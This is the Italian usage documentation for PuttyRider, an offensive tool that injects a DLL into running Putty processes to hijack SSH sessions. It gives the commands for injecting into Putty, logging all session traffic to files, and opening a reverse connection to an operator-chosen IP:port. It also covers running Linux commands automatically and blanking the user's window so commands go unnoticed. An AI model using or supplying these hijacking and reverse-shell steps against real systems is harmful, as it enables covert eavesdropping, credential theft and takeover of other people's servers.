
Esequestrare sessioni Putty per intercettare conversazioni e iniettare comandi Linux.
Dirotta le sessioni Putty per intercettare la conversazione e iniettare comandi Linux.
Elenca i processi Putty esistenti e il loro stato (iniettato / non iniettato)
PuttyRider.exe -l
Inietta la DLL nel primo putty.exe trovato e avvia una connessione inversa dalla DLL al mio IP:Porta, poi esce da PuttyRider.exe.
PuttyRider.exe -p 0 -r 192.168.0.55:8080
Esegue in background e attende nuovi processi Putty. Inietta in qualsiasi nuovo putty.exe e scrive tutte le conversazioni in file locali.
PuttyRider.exe -w -f
Espelle PuttyRider.dll da tutti i processi Putty in cui è già stata iniettata. (Non dimenticare di terminare PuttyRider.exe se è in esecuzione in modalità -w, altrimenti reinietterà di nuovo.)
PuttyRider.exe -x
Modalità operative:
-l Elenca i processi Putty in esecuzione e le loro connessioni
-w Inietta in tutte le sessioni Putty esistenti e attende nuove sessioni
per iniettare anche in quelle
-p PID Inietta solo nella sessione Putty esistente identificata dal PID.
Se PID==0, inietta nel primo Putty trovato
-x Pulizia. Rimuove la DLL da tutte le istanze Putty in esecuzione
-d Modalità debug. Funziona solo con la modalità -p
-c CMD Esegue automaticamente un comando Linux dopo l'iniezione riuscita
PuttyRider rimuoverà gli spazi finali e il carattere '&' da CMD
PuttyRider aggiungerà: " 1>/dev/null 2>/dev/null &" a CMD
-h Mostra questo aiuto
Modalità di output:
-f Scrive tutta la conversazione Putty in un file nella directory locale.
Il nome del file avrà il PID del putty.exe corrente aggiunto
-r IP:PORT Avvia una connessione inversa verso la macchina specificata e
inizia una sessione interattiva.
Comandi interattivi (dopo aver ricevuto una connessione inversa):
!status Verifica se la finestra Putty è connessa all'input utente
!discon Disconnette la finestra Putty principale in modo che non visualizzi nulla
Utile per inviare comandi senza che l'utente se ne accorga
!recon Riconnette la finestra Putty alla sua modalità operativa normale
CMD Comandi della shell Linux
!exit Termina questa connessione
!help Mostra l'aiuto per la connessione client
Usa il prompt dei comandi di Visual Studio:
nmake main dll
Grazie a Brett Moore di Insomnia Security per il suo proof of concept PuttyHijack